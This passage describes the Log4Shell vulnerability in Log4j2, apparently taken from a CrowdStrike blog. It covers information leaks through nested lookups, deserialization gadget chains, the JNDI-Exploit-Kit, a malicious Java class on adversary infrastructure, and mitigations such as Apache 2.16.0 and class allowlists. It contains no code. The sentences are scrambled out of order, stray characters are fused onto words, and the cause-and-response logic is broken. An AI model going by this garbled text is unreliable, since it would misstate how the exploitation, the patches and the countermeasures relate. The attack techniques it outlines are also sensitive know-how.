By passing specially crafted input with nested variables to Log4j2, an attacker can leak sensitive system information that can then be used to construct a gadget chain for the host. 1 CrowdStrike is currently unaware of a reliable method to construct a Log4Shell exploit that applies to all potentially vulnerable products.Īs malicious serialized objects, so-called “gadget chains” must be tailored for specific targets thus, attackers frequently leverage information leaks to obtain information on a host. This concept is implemented in the open-source JNDI-Exploit-Kit. One common strategy is to provide a serialized payload that exploits a deserialization vulnerability, making use of Java code gadgets that are already present in the class path and therefore trusted. In response, attackers are currently working on more complex exploitation scenarios to bypass these restrictions. The Java code is used to download known instances of adversary-specific tooling and is likely to be used in conjunction with the recently disclosed Log4Shell exploit (CVE-2021-44228).Īdditional countermeasures for the Log4j2 vulnerability can be activated to prevent the execution of Java classes if class names are not included in the allowlist, which effectively raises the bar for attackers to deliver and run their own code.
Information surrounding the vulnerability, impacted products and in-the-wild exploitation is continuing to evolve, and CrowdStrike will update this blog as new information becomes available.Īpache has released version 2.16.0, which completely removes support for Message Lookups and disables JNDI by default.ĬrowdStrike has identified a malicious Java class file hosted on infrastructure associated with a nation-state adversary.